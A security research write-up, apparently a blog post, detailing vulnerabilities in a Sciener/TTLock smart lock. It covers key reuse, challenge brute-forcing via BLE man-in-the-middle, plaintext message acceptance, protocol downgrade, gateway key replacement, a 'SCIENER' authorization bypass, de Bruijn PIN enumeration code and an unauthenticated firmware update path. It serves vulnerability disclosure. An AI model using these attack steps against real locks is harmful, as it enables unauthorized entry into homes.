
Say Friend and Enter: Digitally lockpicking an advanced smart lock (Part 2: discovered vulnerabilities)

By Lev Aronsky (@levaronsky) & Idan Strovinsky & Tomer Telem
March 7, 2024
Disclaimer: code excerpts provided here are based on Ghidra's decompiler, and might have syntax issues, such as non-existent types, missing return statements, etc.
Special thanks to Yoav Linhart for his contribution about the de Bruijn sequence in this post.

Preface

The first part of this research explained the work that was done in order to understand the inner workings of Sciener’s firmware, as well as the TTLock application. In this part, we will go over the vulnerabilities we have discovered based on that knowledge and understanding.

Vulnerabilities

Reusing a virtual key

The first vulnerability we thought of - and it follows from simply combining several facts about the protocol - is the ability to reuse a virtual key.

As mentioned before, the TTLock app has the ability to grant virtual keys to arbitrary users. Thus, e.g., an Airbnb guest can install the TTLock app, log in with their own account, and be granted a virtual key to the house for the duration of their stay. However, there are several facts worth considering:

  1. The lock uses a single AES key to communicate with phones. This means that any person who receives a virtual key must also receive the AES key used to communicate with the lock.
  2. When the virtual key is used by the TTLock app, it uses the check_user_time function for authorization - which requires just the time frame during which the virtual key is valid (i.e., the secret adminPs is not required to call this function).
  3. The check_user_time function still requires a challenge response. Therefore, in order to generate one, any person who receives a virtual key must also receive the value of unlockKey.

Armed with the understanding of the above points, the vulnerability becomes clear: any person who receives a virtual key has all the information required to communicate with the lock (1, AES key), to perform authorization using check_user_time (2, using arbitrary time frames such that the virtual key is valid), and to supply a valid challenge response (3, using the value of unlockKey). That information can be extracted from the TTLock app upon receiving it, and used at a later time. As a matter of fact, all of the limits that can be applied to the virtual key (single-time use, validity time frame, etc.) are enforced by the app itself, and not by the lock. And since none of the values change over time, the key will remain usable by the attacker until the lock is reset.

Challenge bruteforcing

Of course, we were interested in the ability to open the lock without prior exposure to a key (limited or not). That’s where the MITM ability would become useful.

By developing a firmware that imitates the lock, we could receive connection attempts from an unsuspecting app in place of the actual lock. The lock is only capable of servicing a single connection at a time - i.e., once an app (or our impersonation device) connects to the lock, it won’t be possible to connect to it again until the connection is closed. Therefore, if we connect to the lock continuously (and keep the connection open, reconnecting as necessary), our impersonation device will be the only one actually broadcasting and accepting connections - and that will ensure the app will connect to our device.

Once the connection to our impersonation device is established by the phone, we can save the initial message coming from the app. Presumably coming from the owner (in an attack scenario where the impersonation device is placed near the actual lock), the message would be an encrypted check_admin command. While we don’t have the encryption key, we do not need it to reuse the message - the message will remain the same since the encryption key and the contents are static. We save the message for future use, and forward it to the actual lock. The lock will receive the message, and reply with a challenge request. Again, we cannot read the contents of the challenge request - but we forward it to the app. The app sends the challenge response. While the response is encrypted, we save it nonetheless - because the encryption is symmetric and uses no random seeds, this message will be reusable whenever the challenge request is the same. We forward the response to the lock, and it unlocks, as the owner expects.

At this point, we have 2 important messages on hand. We have the encrypted check_admin authorization message, that can be used whenever we want; and we have the unlock message that contains a challenge response to a specific challenge request (we do not know the value of the challenge request, since we have no access to the encryption key). Armed with these 2 messages, we can start a bruteforce attack on the lock:

  1. Connect to the lock.
  2. Send the check_admin authorization message.
  3. Receive an encrypted challenge request.
  4. Hope it’s the challenge value that matches our stored challenge response (remember, the challenge value is a random 16-bit integer, so the chance of that is 1/65,536).
  5. Send the stored challenge response. If the lock opens - bingo! Otherwise, disconnect, and go back to step 1.

This kind of bruteforce attack is rather slow, since a new challenge request is only generated upon the first time check_admin is issued during a connection (that’s why we go back to step 1, and not step 2). And the process of reconnecting to the lock can take several seconds - because of its battery-efficient behavior. Thus, given the chance of success of 1/65,536 on each attempt, and several seconds spent on each attempt, in practice such an attack would take several days on average.
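As a rough sanity check of the "several days" figure, the expected duration can be estimated in a few lines of Python. This is only a back-of-the-envelope sketch: the 3-second reconnect time is an assumed stand-in for "several seconds", not a measured value.

```python
# Back-of-the-envelope estimate for the reconnect-based brute force.
CHALLENGE_SPACE = 2 ** 16        # 16-bit challenge -> 65,536 possible values
SECONDS_PER_ATTEMPT = 3.0        # assumption standing in for "several seconds"


def expected_days(seconds_per_attempt: float) -> float:
    """Mean time until a fresh random challenge matches the stored response."""
    # Every reconnect succeeds independently with probability 1/65,536, so the
    # number of attempts is geometrically distributed with mean 65,536.
    expected_attempts = CHALLENGE_SPACE
    return expected_attempts * seconds_per_attempt / 86_400


print(f"{expected_days(SECONDS_PER_ATTEMPT):.1f} days on average")
```

Because every attempt draws a new challenge, there is no guaranteed upper bound here: an unlucky run can take considerably longer than the mean.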

Plaintext message processing

This curious vulnerability was discovered accidentally. As we developed the code for bruteforcing the challenge, we made a mistake: we did not encrypt one of the messages sent to the lock (specifically, the one that contained the challenge response). However, the code worked! In fact, we only realized our mistake days later, when reviewing the code due to a different issue. At this point, we fixed the code, encrypted the message, and the code continued to work as expected. This piqued our curiosity - how was it possible that the code worked in both cases? And to dispel any doubt - the challenge was definitely processed: sending the wrong challenge response failed to open the lock.

We started analyzing the decryption function, and realized something intriguing. At the beginning of the procedure, the length of the buffer is shifted 4 bits to the right (blocks_count = len >> 4; - AES is a block cipher, and the function needs to know the number of 16-byte blocks contained in the ciphertext). Then, in the following line, the block count is checked (if (blocks_count != 0)), and if it’s 0 - that huge block of code inside the if, responsible for the actual decryption process, is skipped!

Control goes directly to LAB_0000d162 (repeated here for clarity), where some logic is applied, and based on the contents of the buffer itself, the function will return either 0 or the length of the buffer:

blocks_count = (uint)plaintext[len - 1];
if ((blocks_count == 0) || (total_decrypted = len - blocks_count, len <= blocks_count)) {
  total_decrypted = 0;
}
return total_decrypted;

To clarify - we want to return a non-zero value, since the return value of the function indicates the number of decrypted bytes. A non-zero return means the function decrypted the ciphertext successfully - but in our case, no changes were made to the ciphertext, and so the caller of this decryption function will proceed to process the “ciphertext” as if it’s the decrypted plaintext. In other words, we’ll be able to send an arbitrary message (with a few limitations, like a length of under 16 bytes), and cause the lock to process it, without the need to encrypt it first.

The logic to return a non-zero value from the function is as follows:

  1. blocks_count is set to the value of the last byte of the message buffer (that’s under our control).
  2. It should be non-zero (otherwise the if condition is met, and total_decrypted is set to 0).
  3. It should also be smaller than the length of the buffer, again - to avoid meeting the if condition.
  4. total_decrypted is set to the difference between the length of the message buffer, and the current value of blocks_count, i.e., the value of the last byte in the message buffer.
  5. The value of total_decrypted is returned.

In fact, to maximize the size of the message we return, we should set the last byte to 01, and the resulting return value will be the length of the original message buffer minus 1.

So, an example buffer that would meet the requirements is de ad be ef 01, and if such a buffer is sent - the lock will process that message, assuming it was successfully decrypted to de ad be ef.
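The return-value logic described above can be modeled in a few lines of Python. This is a sketch of the behavior for short buffers only; the function name decrypt_model is ours, the AES path is deliberately left out, and treating an empty buffer as a failure is our own choice rather than something taken from the firmware.

```python
def decrypt_model(buf: bytes) -> int:
    """Model of the return value of the lock's decryption routine.

    Only the short-buffer path (fewer than 16 bytes) is modeled.
    """
    length = len(buf)
    if length >> 4 != 0:
        # At least one full 16-byte block: the real AES decryption would run.
        raise NotImplementedError("AES path is not modeled in this sketch")
    if length == 0:
        return 0  # our choice for the sketch; not taken from the firmware
    last = buf[length - 1]            # last byte, fully attacker-controlled
    if last == 0 or length <= last:
        return 0                      # treated as a failed decryption
    return length - last              # number of "decrypted" bytes


print(decrypt_model(bytes.fromhex("deadbeef01")))  # 4: de ad be ef is processed
print(decrypt_model(bytes.fromhex("deadbeef00")))  # 0: last byte must be non-zero
print(decrypt_model(bytes.fromhex("deadbeef05")))  # 0: last byte must be < length
```

With a last byte of 01, a message of up to 15 bytes yields up to 14 bytes that the lock treats as plaintext.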

While not very useful on its own, this vulnerability can be leveraged in order to exploit other issues found in the lock’s firmware.

Application protocol downgrade

The TTLock app supports many different locks from Sciener, that communicate over different versions of the protocol. Whereas the latest version of the protocol, used by Kontrol Lux Lock, uses AES encryption, earlier versions are practically unencrypted (yep, XOR with a single byte does not count as encryption in our book). When the lock is first paired/initialized, the app figures out the protocol version to be used with the lock, and stores it. Thus upon subsequent connections to the lock, it knows the correct version of the protocol to use for communicating with the lock - in our case, v3 that uses AES encryption.

However, there is a serious flaw in the app’s logic when processing messages coming from the lock (apparent in the huge method called processCommandResponse, in the com.ttlock.bl.sdk.service.BluetoothLeService class). Instead of relying on what it knows about the lock, the app parses the incoming message, including the information about the protocol version used, and processes the message based on the protocol version indicated in the message header. It means that when we impersonate the lock, upon receiving the initial, AES-encrypted authorization message, we can reply with a response using a lower protocol version (that isn’t encrypted), and the app will process it. Similar to the previous vulnerability, we can supply data to the app without knowing the encryption key.

But wait, there’s more! The issue is exacerbated further by another flaw: once the app processes the protocol version in the response message, it also uses that protocol version in the subsequent messages sent to the lock during that session. It means that we essentially can coerce the app to expose the value of unlockKey during our MITM attack, and as we will see shortly - this will considerably reduce the time required to open the lock during exploitation. The MITM attack flow becomes as follows:

  1. Stage one (MITM attack)
    1. Keep the lock busy, so that the app connects to our impersonation device.
    2. Store the AES-encrypted authorization message, just like before.
    3. Reply with a challenge request with a known value (such as 0), while downgrading the protocol so encryption isn’t used.
    4. Receive an unencrypted challenge response from the app, and calculate the value of unlockKey (if the challenge request was 0, the challenge response is the value of unlockKey).
    5. Store the value of unlockKey, close the connection, and drop the MITM act (at this point, the legitimate user will wonder why the lock didn’t respond to the unlock command, and will presumably try again).
  2. Stage two (unlocking)
    1. Connect to the lock.
    2. Supply the AES-encrypted authorization message.
    3. Receive an AES-encrypted challenge request.
    4. Using the previous vulnerability (plaintext message processing by the lock), respond with an unencrypted challenge response. While we don’t know the challenge value (it was encrypted), we know the value of unlockKey, and we simply guess the challenge value with a 1/65,536 chance that the response will be accepted.

And here’s the kicker: the lock does not close the connection when a wrong challenge response is provided; it does not generate a new challenge request; and it does not limit the number of times a challenge response can be supplied. That means that step 2.4 above is repeated, enumerating over the 65,536 possible values of the challenge, until the lock opens up. And, contrary to the first challenge bruteforcing, in this case the connection to the lock remains open - considerably speeding up the process. Our testing showed that we could send about 30 challenge responses per second. At that rate, it would take about 40 minutes to enumerate over all the possible challenge values. And since the challenge value does not change during the attack, we are guaranteed to open the lock in 40 minutes or less. In fact, the median time for opening the lock will be just 20 minutes.
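The timing figures follow directly from the size of the challenge space and the measured rate. A minimal sketch of the arithmetic, taking the approximate 30 responses per second at face value (the helper name enumeration_minutes is ours):

```python
CHALLENGE_SPACE = 2 ** 16       # 65,536 possible challenge values
RESPONSES_PER_SECOND = 30       # approximate rate reported in the text


def enumeration_minutes(space: int, rate_per_second: float) -> float:
    """Minutes needed to try every value once at a fixed rate."""
    return space / rate_per_second / 60


worst_case = enumeration_minutes(CHALLENGE_SPACE, RESPONSES_PER_SECOND)
# The challenge is fixed for the whole connection, so the correct guess is
# equally likely to sit anywhere in the enumeration: the median is half.
median = worst_case / 2
print(f"worst case ~{worst_case:.0f} min, median ~{median:.0f} min")
```

The exact values come out slightly under the rounded 40 and 20 minutes, which is expected given that the rate itself is only approximate.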

Gateway key replacement

The gateway does not contain the lock encryption key (and thus, any data that is intended for the lock cannot be read by the gateway). Thus, taking control of the gateway does not result in an immediate takeover of the lock itself. Nonetheless, there was one glaring issue with the gateway’s implementation (its server, to be precise).

When we analyzed the protocol used by the gateway, we developed a Python script that would emulate the gateway. The script would connect to Sciener’s server, and authenticate as a gateway. A short reminder - the initial connection would use a known, hardcoded AES key, and afterwards a new, random AES key would be generated and used for subsequent connections.

The gateway is identified by the server solely by its MAC address. So we could easily create a fake gateway with a generated MAC address, and the server would assume that a new gateway has been activated. So far, so good - but what would be the purpose of such a gateway in an attack scenario? The gateway protocol supports a message that indicates a lock detected nearby (essentially, it retransmits the lock’s advertisement packet). That means we could indicate to the server that our fake gateway was next to a real-life lock that we intended to attack. Unfortunately, that wasn’t enough for the server to start sending messages intended for that lock through our gateway - when a gateway is initialized through the proper channels (using the app), it is “paired” to the owner’s locks on the server’s side. So, messages intended for the lock are only sent through gateways belonging to the lock’s owner.

So, we needed to impersonate an existing gateway, i.e. one with a MAC address that was already registered by the server. Ostensibly, this shouldn’t be possible, since the encryption key has already been generated and is in use… But we found this assumption to be completely false!

To recap, the process of a gateway initialization is as follows (we’ll call the hardcoded AES key HAK, and the generated AES key GAK):

  1. Connect to the server and announce yourself (MAC included) encrypted with HAK.
  2. Receive server’s acknowledgement, encrypted with HAK.
  3. Generate a new GAK, encrypt it with HAK, and send it to the server.
  4. Receive server’s acknowledgement, encrypted with the new GAK.
  5. From this point onwards, all communications are encrypted with the new GAK.

When a gateway reconnects to the server after it has already been initialized (e.g. after a power outage), it simply skips steps 3-4 above, and communicates using the GAK that is already stored in the gateway and on the server.

However, we discovered that if we emulate an existing gateway (i.e., use a MAC address that has already been registered with another gateway), and simply send a message with a new GAK, encrypted with HAK, the server accepts it and switches to using it in the following communications! Furthermore, the server uses the most recent connection with a given gateway MAC address. I.e., when the server needs to send a message to the lock through a gateway with the registered MAC, it will use our connection! At this point, we can carry out the same attacks that required a BLE MITM.
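To make the flaw concrete, here is a toy model of the server-side behavior as described above. It is purely illustrative and not Sciener's code: the class, its method names, the MAC address and the key values are all hypothetical, and the actual encryption is left out entirely.

```python
from typing import Dict, Tuple


class ToyGatewayServer:
    """Toy model of the server behavior described above (not Sciener's code)."""

    def __init__(self) -> None:
        self.gak_by_mac: Dict[str, bytes] = {}   # MAC -> currently accepted GAK
        self.conn_by_mac: Dict[str, str] = {}    # MAC -> most recent connection

    def announce(self, mac: str, conn_id: str) -> None:
        # Steps 1-2: the gateway is identified solely by the MAC it announces,
        # and the most recent connection for that MAC replaces the older one.
        self.conn_by_mac[mac] = conn_id

    def set_gak(self, mac: str, new_gak: bytes) -> None:
        # Steps 3-4, including the flaw: the new GAK arrives under the publicly
        # known HAK, and is accepted even when the MAC already has a GAK.
        self.gak_by_mac[mac] = new_gak

    def route(self, mac: str) -> Tuple[str, bytes]:
        # Where, and under which key, lock-bound traffic for this gateway goes.
        return self.conn_by_mac[mac], self.gak_by_mac[mac]


server = ToyGatewayServer()
mac = "AA:BB:CC:DD:EE:FF"                      # placeholder MAC address

server.announce(mac, "real-gateway")
server.set_gak(mac, b"owner-gateway-key")

server.announce(mac, "attacker")               # same MAC, new connection
server.set_gak(mac, b"attacker-chosen-key")    # re-keyed via the hardcoded HAK

print(server.route(mac))                       # traffic now goes to the attacker
```

In this model, the missing safeguard would be a check in set_gak that rejects a new GAK for a MAC that is already registered.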

There is one limitation to this vulnerability: it’s difficult to find out the gateway’s MAC. Whereas the lock advertises itself openly, the gateway only advertises itself for the first 60 seconds from powering up (so that a phone can connect to it and initialize it), and once that time passes (and it’s connected to the server), it uses BLE solely in client mode, to connect to the lock. So, the only plausible way for an attacker to find out the gateway’s MAC would be to cause a power outage to the target apartment - a task that is not necessarily easy, depending on the infrastructure (newer apartments usually have the breakers inside the apartment), and certainly not very stealthy.

Undocumented check_user_time alternative

When analyzing the code in the lock’s firmware that’s responsible for processing the different commands, we found a piece of code that was very similar to the check_user_time command, but instead of verifying the time frame provided was correct, it simply verified that the message contained the word SCIENER. If the check was successful, the function would proceed as if user authorization was achieved, and returned a challenge request. We assume that this command is used by BLE remote controls (not provided with our lock).

Presumably, there’s nothing interesting in this discovery, since the contents of the check_user_time message are not secret (as opposed to check_admin). But there’s one important difference here: the message size of a check_user_time command is 0x11 bytes, meaning it is too long to exploit the plaintext processing vulnerability (which requires a message of under 16 bytes). This new command, on the other hand, only needs to contain the word SCIENER, and thus a message containing the string "SCIENER\x01" will be accepted, processed, and successfully pass the user authorization step (since the value comparison does not use strcmp, but an equivalent of strstr).

Thus, we can gain user authorization without prior knowledge - and without the MITM attack. And once authorized, we can proceed to bruteforce the challenge, again, by providing the challenge responses exploiting the plaintext processing vulnerability. Essentially, we have a challenge bruteforcing attack without any prerequisites.

Unfortunately, while the maximum data throughput of a BLE connection is 1Mbps (or 2Mbps in certain configurations), the lock operates at a far slower rate (presumably, for power efficiency). Thus, we weren’t able to send more than ~30 challenge responses per second. And since in this attack the unlockKey value is unknown, we enumerate over its range (0 to 1,000,000,000, rather than a complete 32 bits, due to the way it’s generated), and not over the 16 bits of the challenge value. Thus, a successful unlocking will take at most about a year, and the median time to unlock will be about half a year, making this attack impractical.

Wireless keypad bruteforcing

In the previous post, we described how a wireless keypad connects to the lock, generates an AES key for further communication, and then transmits key presses performed by its user. Keen-eyed readers will have noticed that the initial key used for starting the communication is hardcoded. In other words, anyone can start communicating with the lock using that key, and the lock will assume it’s a new wireless keypad. The lock does not keep track of previously connected wireless keypads, so this action will always succeed, regardless of whether the lock has been used with a wireless keypad beforehand.

Once the attacker has impersonated a wireless keypad connection, they can send key presses just like a wireless keypad would. However, the protocol supports sending multiple key presses at once (for efficiency, to avoid the overhead of a complete BLE packet for each key press). Therefore, instead of sending each key press separately, the attacker can string multiple PINs one after the other (separated by the # key press), that will be processed by the lock in sequence, instead of testing those PINs by inputting them into the lock keypad manually. This speeds up brute forcing of the PIN considerably.

Another issue that makes the attack even more efficient is the use of the strstr function in the lock’s code, when testing the user input against the stored PIN. Given that the admin’s PIN code generated at lock initialization consists of 7 digits, and PIN codes can be 10 digits in length, each 10-digit PIN code sent by the attacker actually tests for multiple options. For example, when the attacker tests the PIN 0123456789, the lock will open if the actual PIN is any of:

  • 0123456
  • 1234567
  • 2345678
  • 3456789

That’s 4 tests in a single attempt (and remember, multiple attempts in a single BLE message are possible)! Enumerating over all the PIN options in the most efficient way is basically the following combinatorial problem: find a set of minimum size that consists of 10-digit strings, such that every possible 7-digit string appears as a consecutive substring of some string in the set. There are 10^7 strings of 7 digits. Therefore, a naive solution would be to simply pad each 7-digit string with zeroes and call it a day. But can we do better?
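The effect of a substring-style comparison is easy to reproduce in Python. This is only a model of the behavior described above (the function names are ours), with Python's in operator playing the role of strstr:

```python
from typing import List


def pin_accepted(entered: str, stored_pin: str) -> bool:
    """strstr-style check: the stored PIN only has to occur somewhere
    inside the digits that were entered."""
    return stored_pin in entered


def pins_covered(entered: str, pin_len: int = 7) -> List[str]:
    """All candidate PINs of length pin_len tested by a single entry."""
    return [entered[i:i + pin_len] for i in range(len(entered) - pin_len + 1)]


print(pins_covered("0123456789"))
# ['0123456', '1234567', '2345678', '3456789']
print(pin_accepted("0123456789", "2345678"))   # True
print(pin_accepted("0123456789", "2345679"))   # False
```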

Every 10-digit string contains at most 4 distinct 7-digit substrings, so the best we can hope for is to use 10^7/4 strings in total. Is such a solution possible? Turns out that the answer is yes! The algorithm heavily relies on the de Bruijn Sequence.

Let’s look at a de Bruijn sequence of order 7 on a size-10 alphabet - it is a cyclic sequence in which every 7-digit string occurs exactly once as a substring. The general de Bruijn sequence is denoted as B(k, n) and it has the length k^n (we have k=10, n=7). The construction of B(k, n) is well known. This Python code, taken from Wikipedia, constructs it:

from typing import Iterable, Union, Any

def de_bruijn(k: Union[Iterable[Any], int], n: int) -> str:
    """de Bruijn sequence for alphabet k
    and subsequences of length n.
    """
    # Two kinds of alphabet input: an integer expands
    # to a list of integers as the alphabet..
    if isinstance(k, int):
        alphabet = list(map(str, range(k)))
    else:
        # While any sort of list becomes used as it is
        alphabet = k
        k = len(k)

    a = [0] * k * n
    sequence = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                sequence.extend(a[1 : p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in sequence)


print(de_bruijn(10, 7))

How does this solve our problem? Well, we can “slice” the sequence into strings of length 10. The first string will consist of the digits in indexes 0 to 9, the second - 4 to 13, the third - 8 to 17, and so on. The first 18 digits of our de Bruijn sequence will be 000000010000002000. Therefore, the first 3 strings will be:

  • 0000000100
  • 0001000000
  • 0000002000

In the end (with the last few strings wrapping around to the beginning of the cyclic sequence), we will end up with 10^7/4 strings, and every 7-digit string will appear as a substring exactly once. That results in a complete enumeration within 10^7/4 (2,500,000) attempts, and on average, half of these attempts (1,250,000) will be required.
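The slicing step can be checked on a smaller instance, where the result is quick to verify. The sketch below repeats a compact, digits-only variant of the construction above so that it runs on its own; slice_guesses is our own helper name, and the small parameters (alphabet of 4, PIN length 3) are chosen only to keep the run time negligible.

```python
from typing import List


def de_bruijn(k: int, n: int) -> str:
    """Compact digits-only variant of the construction above (k <= 10)."""
    a = [0] * (k * n)
    seq: List[int] = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(map(str, seq))


def slice_guesses(seq: str, n: int, per_guess: int) -> List[str]:
    """Cut a cyclic de Bruijn sequence into overlapping guesses.

    Each guess is n + per_guess - 1 digits long, so it contains per_guess
    windows of length n; consecutive guesses start per_guess digits apart.
    """
    width = n + per_guess - 1
    cyclic = seq + seq[:width - 1]   # unroll the cycle so late slices can wrap
    return [cyclic[i:i + width] for i in range(0, len(seq), per_guess)]


# Small instance: alphabet of 4 digits, "PINs" of length 3, 4 PINs per guess.
seq = de_bruijn(4, 3)
guesses = slice_guesses(seq, 3, 4)
covered = {g[i:i + 3] for g in guesses for i in range(4)}
assert len(guesses) == 4 ** 3 // 4   # 16 guesses instead of 64
assert len(covered) == 4 ** 3        # every 3-digit string is tested

# Full-size case from the text (takes noticeably longer to generate):
# guesses = slice_guesses(de_bruijn(10, 7), 7, 4)
```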

It sounds like a very serious flaw that would allow opening the lock very quickly, and it would be - but it’s hindered by one protection mechanism that makes this attack impractical. In the case of PIN codes, as opposed to challenge responses, the lock actually limits the number of mistakes a user can make (it’s about 5). Once the limit is reached, the lock emits an alarm sound, and refuses any input for about 15 seconds. This is a limitation that, despite our best efforts, we were not able to circumvent. And so, even if the alarm sound is deemed insignificant, enumerating all the possibilities will take a prohibitively long time. Nonetheless, if somebody does discover a way to overcome the rate limit, this vulnerability becomes critical and allows opening the lock in a matter of minutes at most.
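To put "prohibitively long" into numbers, here is a rough estimate that counts only the lockout time. Both the limit of 5 mistakes and the 15-second lockout are the approximate values mentioned above, so the result is an order-of-magnitude figure rather than a measurement.

```python
TOTAL_GUESSES = 10 ** 7 // 4     # 2,500,000 ten-digit guesses
MISTAKES_PER_LOCKOUT = 5         # approximate limit observed on the lock
LOCKOUT_SECONDS = 15             # approximate lockout duration


def lockout_days(guesses: int) -> float:
    """Days spent waiting out lockouts; transmission time is ignored."""
    lockouts = guesses // MISTAKES_PER_LOCKOUT
    return lockouts * LOCKOUT_SECONDS / 86_400


print(f"full enumeration: ~{lockout_days(TOTAL_GUESSES):.0f} days")
print(f"average case:     ~{lockout_days(TOTAL_GUESSES // 2):.0f} days")
```

Even with the de Bruijn optimization, the rate limit alone stretches the attack to months, with the alarm sounding throughout.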

Unauthenticated update and complete takeover

From the beginning of our research, we focused on the BLE service used by the app to send various commands to the lock, identified by the UUID 00001910-0000-1000-8000-00805f9b34fb. In fact, we even began analyzing the relevant command for engaging the OTA update (command 0x02), but it required successfully passing the check_admin check and challenge, so we did not investigate it further at the time.

At some point, however, as we were poking around the firmware, we realized something quite surprising: there was another BLE service, with a separate write characteristic and all, responsible for the firmware update! We’ve actually seen this service before (it’s exposed during the regular BLE scan), but we ignored it, not knowing its purpose. Now, however, we reached the point in the firmware that was responsible for handling messages in this service, and - eventually - updating the firmware on the lock (shortened for brevity):

undefined4 handle_ota_packet(byte *value)
{
  [...]  
  first_short = *(ushort *)(value + 0xd);
  offset = (uint)first_short;
  if (offset == 0xff00) {
    if (context->handler_0 == NULL) {
      return 0;
    }
    call_function_indirect
              ((char)value,(char)in_r1,in_r2,context->handler_0);
    return 0;
  }
  if (offset == 0xff01) {
    context->field_0x20 = 1;
    context->time_of_last_write = *(uint *)PTR_REG_SYSTEM_TICK_00026360;
    context->last_written_offset = 0xfffffffe;
    if (context->handler_1 != NULL) {
      call_function_indirect((char)value,(char)in_r1,1,context->handler_1);
    }
    context->first_packet_was_fw_start = false;
    context->expected_packet_count = 0x4000;
    return 0;
  }
  if (offset == 0xff02) {
    uVar4 = (uint)value[0x10];
    in_r1 = (uint)value[0x11];
    bVar2 = 0;
    if (context->first_packet_was_fw_start != false) {
      bVar2 = ~(context->fw_written_successfully +
                ~context->fw_written_successfully + 1) & 6;
    }
    uVar1 = (uint)value[6];
    if (*(short *)(value + 6) == 9) {
      in_r1 = (uint)(*(ushort *)(value + 0x11) ^ *(ushort *)(value + 0xf));
      uVar1 = uVar4;
      if ((in_r1 == DAT_00026368) &&
         ((uint)*(ushort *)(value + 0xf) != context->last_written_offset)
         ) {
        bVar2 = 4;
        goto LAB_000260f4;
      }
    }
    uVar4 = uVar1;
    if (bVar2 == 0) {
      if (context->handler_2 != NULL) {
        call_function_indirect
                  (0,(char)in_r1,(char)uVar4,context->handler_2);
      }
      mark_firmware_for_boot();
      reboot();
      return 0;
    }
    goto LAB_000260f4;
  }
  uVar4 = context->last_written_offset + 1;
  if (uVar4 != offset) {
    bVar2 = 1;
    if ((int)offset <= (int)context->last_written_offset) {
      return 0;
    }
    goto LAB_000260f4;
  }
  uVar4 = checksum(value + 0xd,0x12);
  in_r1 = 0;
  bVar2 = 2;
  if (uVar4 != *(ushort *)(value + 0x1f)) goto LAB_000260f4;
  if (offset == 0) {
    if (value[0x15] == 0x5d) {
      if (value[0x16] != 2) goto LAB_000262be;
      context->first_packet_was_fw_start = true;
      first_packet_was_fw_start = true;
      do_not_write = false;
    }
    else if (value[0x15] == 0) {
      context->first_packet_was_fw_start = SUB21(first_short,0);
      first_packet_was_fw_start = false;
      do_not_write = false;
    }
    else {
LAB_000262be:
      first_packet_was_fw_start = false;
      context->first_packet_was_fw_start = false;
      do_not_write = true;
    }
    context->fw_start_checksum = 0xfffffffe;
  }
  else {
    first_packet_was_fw_start = context->first_packet_was_fw_start;
    do_not_write = false;
  }
  if (first_packet_was_fw_start != false) {
    expected_packet_count = (uint)context->expected_packet_count;
    if (offset <= expected_packet_count) {
      if (offset == 1) {
        uVar4 = (uint)value[0x1a] << 0x18 |
                (uint)value[0x18] << 8 | (uint)value[0x19] << 0x10 | (uint)value[0x17];
        if ((DAT_0002636c < uVar4 - 1) || ((value[0x17] & 0xf) != 4)) {
          context->expected_packet_count = 0x4000;
          first_packet_was_fw_start = false;
          context->first_packet_was_fw_start = false;
          do_not_write = true;
        }
        else {
          context->expected_packet_count = (short)(uVar4 >> 4) - 1;
        }
      }
      pbVar6 = local_44;
      pbVar3 = value;
      pbVar5 = pbVar6;
      do {
        bVar2 = pbVar3[0xf];
        *pbVar5 = bVar2 & 0xf;
        pbVar5[1] = bVar2 >> 4;
        pbVar3 = pbVar3 + 1;
        pbVar5 = pbVar5 + 2;
      } while (pbVar5 != &stack0xffffffdc);
      in_r1 = context->fw_start_checksum;
      do {
        in_r1 = *(uint *)(PTR_DAT_00026364 + ((in_r1 ^ *pbVar6) & 0xf) * 4) ^ in_r1 >> 4;
        pbVar6 = pbVar6 + 1;
      } while (pbVar6 != pbVar5);
      context->fw_start_checksum = in_r1;
      if (first_packet_was_fw_start == false) goto LAB_00026246;
      expected_packet_count = (uint)context->expected_packet_count;
    }
    if (offset == expected_packet_count + 1) {
      uVar4 = context->fw_start_checksum;
      bVar2 = 6;
      if (uVar4 != ((uint)value[0x12] << 0x18 |
                   (uint)value[0x10] << 8 | (uint)value[0x11] << 0x10 | (uint)value[0xf]))
      goto LAB_000260f4;
      context->fw_written_successfully = 1;
    }
  }
LAB_00026246:
  bVar2 = 6;
  uVar4 = 0;
  if (!do_not_write) {
    flash_write_16_bytes(offset * 0x10,value + 0xf);
    flash_read_page(offset * 0x10 + context->base_address,0x10,local_44);
    write_failed = memcmp(local_44,value + 0xf,0x10);
    bVar2 = 3;
    in_r1 = extraout_r1;
    uVar4 = extraout_r2;
    if (write_failed == 0) {
      context->last_written_offset = offset;
      return 0;
    }
  }
LAB_000260f4:
  if (context->handler_2 != NULL) {
    call_function_indirect(bVar2,(char)in_r1,(char)uVar4,context->handler_2);
  }
  uVar4 = context->last_written_offset;
  if (-1 < (int)uVar4) {
    *PTR_REG_IRQ_MASK+3_00026354 = 0;
    uVar4 = 0x3ff00 & uVar4;
    do {
      flash_erase_sector(uVar4 * 0x10 + context->base_address);
      uVar4 += -0x100;
    } while (-1 < (int)uVar4);
  }
  reboot();
  return 0;
}

That function is rather long, with various logic checks applied throughout it, but here is an attempt to describe the process in a simple manner:

  1. There are 4 types of messages that this service can process - 3 control messages and 1 data message:
    1. Control message 0xff00 - unimplemented in the analyzed firmware (the app side refers to this as “prepare firmware update”)
    2. Control message 0xff01 - begin firmware update
    3. Control message 0xff02 - complete firmware update
    4. Data message, containing a 16-bit offset (flash address to write to), the bytes to be written (up to 16), and the CRC of the message. The offset should be aligned to 0x10.
  2. First, the 0xff01 control message is sent, indicating that a firmware update is about to begin. When handling this message, the lock verifies that a firmware update has actually been requested, by checking a flag that is set when the OTA command (command 0x02, mentioned above) is sent. The handler prepares the firmware update process by setting the expected chunk count to 0x4000 (with each chunk being 0x10 bytes long, this corresponds to a firmware size of 0x40000 bytes - exactly the size of a flash partition). It also initializes another variable in the context structure that is supposed to hold the last offset that has been written.
  3. Next, firmware chunks are sent one by one, with increasing offsets. As each chunk is received, the lock verifies a few things (that it’s the expected chunk - i.e., the offset follows the previously received one; that the expected amount of chunks hasn’t been reached), and then writes the data to flash. It’s worth noting here that the lock uses two flash partitions, at offsets 0x0 and 0x40000, to hold the firmware. One partition is marked active (and is booted and running), and the other is marked inactive (and the OTA update is written to it). The app sending the update does not need to be aware of the actual partition in use, and should always use offsets starting from 0x0 - the lock maps it to 0x40000 automatically, if required.
  4. Finally, the 0xff02 control message is sent. The lock marks the written firmware as ready to boot (and the currently running firmware as invalid), and reboots. Upon boot, the bootloader will select the new active partition, and the new firmware will be up and running at that point.
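
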